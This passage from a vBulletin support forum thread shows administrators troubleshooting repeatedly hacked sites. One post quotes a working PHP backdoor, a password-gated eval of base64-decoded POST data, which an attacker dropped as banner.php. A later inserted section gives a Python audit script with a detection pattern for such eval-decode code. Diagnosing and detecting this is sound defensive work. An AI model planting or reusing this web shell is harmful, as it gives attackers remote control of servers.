Help. Both forum and admin panel just show white page

  • BirdOPrey5
    Senior Member
    • Jul 2008
    • 9613
    • 5.6.3

    #31
    Can you or your host determine how the files are being altered?

    Comment

    • Dominic.J.E
      New Member
      • Mar 2008
      • 3
      • 3.6.x

      #32
      Well, it was perfectly fine for 2 days after cleaning up everything and I even left the plugin system "Disabled" through the config file. Now the site is blank white pages again and banner.php was uploaded again (already had this and the other files deleted) with the code:

      <?php
      if(@md5($_POST["gif"]) === "320648220d6bd8b8e51ec3b6d6dd8898") {
      eval (base64_decode($_POST["php"]));
      exit;
      }
      ?>

      And now a lot of the pages have the base64 again. So we can knock Custom Modifications / Plugins off this list.

      Their host is not cooperating and saying they don't support third party scripts.
      I'm looking at the "Last Modified" date and it seems to not change to the newest date they did it, even with these code modifications.

      Comment
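
      Post #32 reports that "Last Modified" dates do not move when files are altered, so a timestamp search will miss both the re-uploaded banner.php and the pages with injected base64. The sketch below is an added example, not code from the thread or from vBulletin: it compares the live tree to a known-clean copy by content hash and flags `eval()` fed by a decoder call. The two directory arguments and the list of decoder names are assumptions.

```python
import hashlib
import os
import re
import sys

# eval() fed by a decoder call: the shape of the banner.php dropper quoted above.
# The decoder list is an assumption; extend it for your own environment.
EVAL_DECODE = re.compile(rb"eval\s*\(\s*@?\s*(base64_decode|gzinflate|str_rot13)\s*\(", re.I)

def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def php_files(root):
    """Yield (relative path, full path) for every PHP-like file under root."""
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if name.lower().endswith((".php", ".phtml", ".inc")):
                full = os.path.join(dirpath, name)
                yield os.path.relpath(full, root), full

def build_manifest(root):
    """Hash every PHP file under a known-clean tree (assumed: a fresh package copy)."""
    return {rel: sha256_file(full) for rel, full in php_files(root)}

def audit(root, manifest):
    """Compare the live tree to the manifest by content, ignoring timestamps."""
    report = {"added": [], "changed": [], "eval_decode": []}
    for rel, full in php_files(root):
        if rel not in manifest:
            report["added"].append(rel)        # e.g. a re-uploaded banner.php
        elif sha256_file(full) != manifest[rel]:
            report["changed"].append(rel)      # content differs even if mtime does not
        with open(full, "rb") as fh:
            if EVAL_DECODE.search(fh.read()):
                report["eval_decode"].append(rel)
    for key in report:
        report[key].sort()
    return report

if __name__ == "__main__":
    # Hypothetical usage: python audit.py /path/to/clean_copy /path/to/live_site
    clean_root, live_root = sys.argv[1], sys.argv[2]
    for kind, files in audit(live_root, build_manifest(clean_root)).items():
        for rel in files:
            print(f"{kind}\t{rel}")
```

      Files reported as "added" or "changed" still need manual review, since legitimate customisations and uploads will also appear there.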

      • Mr. Fancy Pants
        New Member
        • Nov 2007
        • 15
        • 3.6.x

        #33
        I just had to deal with this too, in fact.....still am. I sure hope vBulletin is looking real hard at this issue. Once they got in via our forum, I found additional php files in the root of my public_html folder. An uploader php file, pawn3d php file and a database php file. Also, a Story php file in the forums root.

        vBulletin, are you looking into this??

        Comment

        • BirdOPrey5
          Senior Member
          • Jul 2008
          • 9613
          • 5.6.3

          #34
          At this time there is still no known exploit causing this issue - it seems to be people affected by the old "install" folder hack that were never cleaned up properly. That is to say backdoors were left in plugins and/or in directories on the server and were left dormant until recently. If we determine there is any unknown exploit we will take action quickly.

          Comment

          • psypher
            New Member
            • Dec 2009
            • 10
            • 4.0.0

            #35
            I have been hacked with this same exploit 8 times over the last 2 months. I am on 4.2.2. I have 5 different websites on the same host. The only site that is being hacked is the one running vBulletin. In my mind it is safe to assume VB has been very insecure since the install folder exploit and hasn't become any better. I have no new admin account, I have not installed any plugins recently. I have to change all my passwords and clean my site weekly.

            There is no way I can continue paying for this software and upgrade to 5. I have lost all faith in VB. It was a good run boys but time to move on to something more secure.

            Comment

            • Wayne Luke
              vBulletin Technical Support Lead
              • Aug 2000
              • 73976

              #36
              You changed all your passwords? FTP, CPanel, vBulletin? You placed .htaccess on your admincp directory? Are you running vBSEO? If so, I suggest removing it immediately.

              If you continue to get attacked, there is a backdoor on your server somewhere. Most likely placed during the initial attack. Did you go through all the steps in the "Securing your site" thread? As stated in that thread, skipping one can leave you vulnerable to future attacks.

              Wayne Luke
              The Rabid Badger - a vBulletin Cloud demonstration site.
              vBulletin 5 API

              Comment

              • psypher
                New Member
                • Dec 2009
                • 10
                • 4.0.0

                #37
                I have changed all those passwords. I have not moved my htaccess file. I am not running vBSEO.

                That thread was the first thing I went through. I have been running the queries and running greps for the infected files. Clearly there is some type of backdoor. Problem is finding and removing it. Unfortunately I was away for a couple months so any backups of a clean site are long gone for me and I fear the issue is in my database which I absolutely cannot afford to lose.

                TheLastSuperman has some other things I can try in his thread. Hopefully something will work so I can at least get to the point of migrating my database to something stable. I find it hard to believe there has been no acknowledgement from VB on this issue. It has to be kicking sales in the nuts having a new major hack for the software every couple months.

                Comment

                • Inzvestor
                  New Member
                  • Nov 2010
                  • 21

                  #38
                  I am just reinstalling my forum for about the 8th time and will be calling support shortly.

                  Same problem keeps occurring and I have followed the instructions to the letter each time.

                  Comment

                  • Inzvestor
                    New Member
                    • Nov 2010
                    • 21

                    #39
                    dupe post

                    Comment
